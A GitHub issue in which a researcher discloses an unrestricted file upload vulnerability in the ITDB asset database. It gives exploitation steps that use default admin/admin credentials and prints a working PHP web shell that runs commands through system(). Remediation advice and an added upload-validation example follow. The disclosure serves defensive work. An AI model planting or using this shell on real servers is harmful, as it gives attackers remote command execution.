This repository has been archived by the owner on May 27, 2023. It is now read-only.

I Found The Security Issue #69

Open
rungga opened this issue Sep 8, 2017 · 1 comment

Comments


rungga commented Sep 8, 2017

Hey Sivann,

I found a security issue / vulnerability in the ITDB application. I have sent a Proof of Concept to your email "[email protected]".

Is it possible for me to post the vulnerability here?


rungga commented Sep 11, 2017

PoC ITDB - Unrestricted File Upload.pdf

Exploit Title: Unrestricted File Upload Vulnerability on ITDB (IT ITems DataBase) Application
Date: Sept 07th, 2017
Exploit Author: @rungga_reksya
Vendor Homepage: http://www.sivann.gr/software/itdb/
Software Link: https://github.com/sivann/itdb/archive/master.zip
Version: 1.23
Tested on: Windows Server 2008 R2 
CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)

I. Application Background:
ITDB is a web-based asset inventory management tool used to store information about assets found in office environments, with a focus on -but not limited to- IT assets. It does not target ITIL/CMDB compliance (yet), but it has served me for years and hopefully it will do the same for you :-)
ITDB comes with sources and is distributed under the GNU Public license.

II. Vulnerability Description:
An unrestricted file upload vulnerability in the “Add File” menu of ITDB version 1.23 allows an authenticated user whose account type is “Full Access” or “Read” to upload malicious code (a shell) with the extension “php”.

III. Exploit:
If we refer to the file “00-INSTALL.txt”, the default username and password are “admin/admin”. For example, an attacker who has obtained admin privileges logs in as admin to the ITDB application. Then the attacker goes to the “Add File” menu, uploads their shell (shellcmd.php), and clicks Save —> Bingo, success.

Directory Listing at “http://target.com/itdb-directory/data/files/”

Check your shell on field “Filename” and access your shell like this:
http://target.com/[itdb-directory]/data/files/yourshell.php?cmd=whoami

Script for shellcmd.php:

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

======

IV. Remediation:
Restrict file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use a whitelist approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without a filename like .htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on the upload folder so the files within it are not executable. If possible, rename the files that are uploaded. (source: https://www.acunetix.com/vulnerabilities/web/unrestricted-file-upload)

Content-type Verification: This kind of verification completely depends upon content-type header, e.g. Content-Type: image/jpeg, containing the MIME type. This is a very weak validation mechanism, as this header is supplied by the user or attacker. (source: https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)

V. Proof of Concept:

Admin Privilege (Full Access): [4 screenshots attached]

Low User (Read Only): [5 screenshots attached, taken 2017-09-08]
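As an added illustration of the remediation rules listed in section IV (extension allowlist, no double extensions, no dotfiles such as .htaccess, rename on storage), here is a small PHP validation routine. It is not code from ITDB or from the reporter; the names validate_upload_name, stored_name and ALLOWED_EXTENSIONS are hypothetical.

```php
<?php
// Added example, not ITDB's code: allowlist-based validation of a
// client-supplied upload filename, plus renaming for on-disk storage.
declare(strict_types=1);

// Allowlist: only these extensions may be stored; anything else is refused.
const ALLOWED_EXTENSIONS = ['pdf', 'png', 'jpg', 'jpeg', 'txt'];

/**
 * Returns the lowercase extension if $clientName is acceptable, or null if
 * the upload must be rejected. Rules: allowlist, single extension, no dotfiles.
 */
function validate_upload_name(string $clientName): ?string
{
    // Drop any path component the client sent ("..\\x.php", "/etc/passwd").
    $base = basename(str_replace('\\', '/', $clientName));

    // Reject empty names and dotfiles such as ".htaccess" (no real filename).
    if ($base === '' || $base[0] === '.') {
        return null;
    }

    // Require exactly one dot: "shell.php.png" (double extension) is refused.
    // This is deliberately strict; "report.v2.pdf" is refused as well.
    $parts = explode('.', $base);
    if (count($parts) !== 2 || $parts[0] === '' || $parts[1] === '') {
        return null;
    }

    $ext = strtolower($parts[1]);
    return in_array($ext, ALLOWED_EXTENSIONS, true) ? $ext : null;
}

/**
 * Name the file is stored under: a random token plus the validated extension,
 * so the uploader never controls the on-disk filename.
 */
function stored_name(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample client filenames exercising each rule.
$samples = ['report.pdf', 'shellcmd.php', 'shell.php.png', '.htaccess', 'logo.PNG'];
foreach ($samples as $name) {
    $ext = validate_upload_name($name);
    printf("%-16s => %s\n", $name, $ext === null ? 'REJECTED' : 'stored as ' . stored_name($ext));
}
```

Filename checks alone are not sufficient: the stored files should also live in a directory where the web server does not execute scripts, as section IV recommends.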
